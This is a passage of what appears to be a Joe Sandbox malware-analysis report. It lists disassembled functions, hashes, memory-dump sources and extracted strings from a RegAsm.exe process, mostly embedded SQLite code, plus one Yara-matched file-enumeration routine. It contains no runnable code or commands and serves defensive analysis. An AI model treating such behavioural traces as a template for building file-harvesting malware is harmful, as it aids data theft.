                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (FK)
                                                                                                                                                                                                • API String ID: 0-1642768157
                                                                                                                                                                                                • Opcode ID: 0814285b6810c0ebd20f4e43fc2232166b8e8006f657536689d7e9cf560282dc
                                                                                                                                                                                                • Instruction ID: 7c6d62fa4e290ebdc907c34b889d516732975a2b9b4e0ee6517f081c207c5e8b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0814285b6810c0ebd20f4e43fc2232166b8e8006f657536689d7e9cf560282dc
                                                                                                                                                                                                • Instruction Fuzzy Hash: F281D77F7052009FEB009F29EC80B96F7A1FB84335F24866EE586976A1E732E511DB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B628D80 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 271COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                • API String ID: 0-2815843928
                                                                                                                                                                                                • Opcode ID: 03cbb361dd652c68e623911a9c663b6eb8e515f5004563a97a30cbfa916c5ab1
                                                                                                                                                                                                • Instruction ID: 34baf2fa92d393f7342cbc73b39f95de2fbfe01dff796cecdc8bed2780ce5d9f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 03cbb361dd652c68e623911a9c663b6eb8e515f5004563a97a30cbfa916c5ab1
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA91FDB0900311ABEB049F64CC88B9777ACBFA0355F44066DFCC997241E735E958CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BEB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • database corruption, xrefs: 1B4BECD5
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4BECDA
                                                                                                                                                                                                • %.*s%s, xrefs: 1B4BEC88
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4BECCB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-894757972
                                                                                                                                                                                                • Opcode ID: 99777d64409a22d8854572072791254972214cb28cdf0e36cc2433c65ca66de3
                                                                                                                                                                                                • Instruction ID: a49efca2b14589892db43a56ca7a7ba4252e460cebd1fff268c0c29263478e58
                                                                                                                                                                                                • Opcode Fuzzy Hash: 99777d64409a22d8854572072791254972214cb28cdf0e36cc2433c65ca66de3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F61E375A443418BDB24CF14CA81AEBB7F1AFC8714F048D6CE9899B341D735E945CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B499DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: [%!g,%!g],$[%!g,%!g]]
                                                                                                                                                                                                • API String ID: 0-3388633204
                                                                                                                                                                                                • Opcode ID: 4011be12b25922a1a4e21b3965c9d44b0681f62f27b98117cac249d1591be248
                                                                                                                                                                                                • Instruction ID: af5b3ce9ac5d4c8047234bb33003af26e3f0604e43694255a5edd77b0d3fcc0b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4011be12b25922a1a4e21b3965c9d44b0681f62f27b98117cac249d1591be248
                                                                                                                                                                                                • Instruction Fuzzy Hash: D25128749007069BDB10DF69ECC4B97BBB4AF9A310F00861DFC8996241E775E489CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BF330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1B4BF418
                                                                                                                                                                                                • INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B4BF33F
                                                                                                                                                                                                • malformed inverted index for FTS%d table %s.%s, xrefs: 1B4BF3F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
                                                                                                                                                                                                • API String ID: 0-2809892521
                                                                                                                                                                                                • Opcode ID: ee5c5272594c287bc3584bd0bdeb93b02ed8a7b01c83ef9510aac51e96d7cbf2
                                                                                                                                                                                                • Instruction ID: be7d22d1c77e28fe898419bd949cb6a2578571de44d0a00e3437540120dee53a
                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5c5272594c287bc3584bd0bdeb93b02ed8a7b01c83ef9510aac51e96d7cbf2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6941C4719012219BD718AF65EC88BDB3B6CEFA4265F04882DFD89C2241D731D55DCBB2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C6E30 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 30COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4C6E62
                                                                                                                                                                                                • invalid, xrefs: 1B4C6E47
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4C6E4C
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4C6E67
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4C6E58
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
                                                                                                                                                                                                • API String ID: 0-3670841456
                                                                                                                                                                                                • Opcode ID: 1ae217adf6e2fbb2f759bd11c70840521828c86f3b499255bd0735594ce934e3
                                                                                                                                                                                                • Instruction ID: ed283b2a72ec2de38416cd6071c531fc4223db368e81d6326a9326863f8db62a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ae217adf6e2fbb2f759bd11c70840521828c86f3b499255bd0735594ce934e3
                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF02768A00144BAEF145218CD42BEA3B221B68B06F80C14EF1951F286C32664438350
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C6EB0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4C6EE5
                                                                                                                                                                                                • invalid, xrefs: 1B4C6ECA
                                                                                                                                                                                                • API call with %s database connection pointer, xrefs: 1B4C6ECF
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4C6EEA
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4C6EDB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse
                                                                                                                                                                                                • API String ID: 0-3670841456
                                                                                                                                                                                                • Opcode ID: 589ca54cdb5fca9a3cb4703c4efc30dca79f4af0e461bd3b5bd8f1d38e613083
                                                                                                                                                                                                • Instruction ID: 0ec5623132c005a5d0e2eb1d3fc05155505aecd118ee9ed1288a8c730fa9f49e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 589ca54cdb5fca9a3cb4703c4efc30dca79f4af0e461bd3b5bd8f1d38e613083
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49F0E578B04584BFEF204210DD62FE72B961794B03F80C1AAF2915F2E2E724A4404311
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B30F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1672879316270d8679779d830de0ef40e57e318551c8266025f220ddf6d90acc
                                                                                                                                                                                                • Instruction ID: 2b82ecaca1a69a3cf2d0139c3b76ff0669bf290cecf4c559af3def420791ff50
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1672879316270d8679779d830de0ef40e57e318551c8266025f220ddf6d90acc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D518475608200AFDB40EB64FC45FEA7BE2EFC5320F0985A8F558872B1E631D9519B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00415199 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041519E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004151F4
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0041521A
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0041523A
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0041524E
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00415261
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00415275
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00415288
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00414ED2: _EH_prolog.MSVCRT ref: 00414ED7
                                                                                                                                                                                                  • Part of subcall function 00414ED2: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00414EEF
                                                                                                                                                                                                  • Part of subcall function 00414ED2: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00414EF6
                                                                                                                                                                                                  • Part of subcall function 00414ED2: wsprintfA.USER32 ref: 00414F0E
                                                                                                                                                                                                  • Part of subcall function 00414ED2: FindFirstFileA.KERNEL32(?,?), ref: 00414F25
                                                                                                                                                                                                  • Part of subcall function 00414ED2: StrCmpCA.SHLWAPI(?,00425838), ref: 00414F42
                                                                                                                                                                                                  • Part of subcall function 00414ED2: StrCmpCA.SHLWAPI(?,0042583C), ref: 00414F5C
                                                                                                                                                                                                  • Part of subcall function 00414ED2: wsprintfA.USER32 ref: 00414F80
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2058169020-0
                                                                                                                                                                                                • Opcode ID: edcf4ba042a2a60bc2fec9dfa5b2655c768123c02b02134ec45f543cf66a4bf4
                                                                                                                                                                                                • Instruction ID: 3a2e9aa6764a06c96bbb454120c3335839c9a93bb3da0b164c669daa5d799fab
                                                                                                                                                                                                • Opcode Fuzzy Hash: edcf4ba042a2a60bc2fec9dfa5b2655c768123c02b02134ec45f543cf66a4bf4
                                                                                                                                                                                                • Instruction Fuzzy Hash: B341CEB2D0022DAACF11EBE1DC49EDE777CAB19314F4005BAB509E3155EA38D7588FA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AB6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 40742c4e5ee129739a7085e27133753dd1fa2796ca20c604c64af7d22d850fe6
                                                                                                                                                                                                • Instruction ID: f56ce666a3f8dc8792a426ead96b289c0b3afba88077b89616071d29f935a704
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40742c4e5ee129739a7085e27133753dd1fa2796ca20c604c64af7d22d850fe6
                                                                                                                                                                                                • Instruction Fuzzy Hash: A31196F99041107FDE049B24FC42FAB7B69EF95610F44849CF886C7210E736E919D2A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B507920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
